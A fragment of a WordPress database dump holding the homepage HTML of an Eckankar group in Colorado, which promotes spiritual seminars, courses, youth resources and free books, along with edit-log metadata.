https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242882,41185,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 18px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242883,41185,'_message_key','post_updated'),(242884,41185,'_user_id','2'),(242885,41185,'_user_login','S8zhaBda'),(242886,41185,'_user_email','nada@zipnadanot.org'),(242887,41185,'_server_remote_addr','76.130.120.x'),(242888,41185,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(242889,41186,'post_id','7160'),(242890,41186,'post_type','page'),(242891,41186,'post_title','Home'),(242892,41186,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" 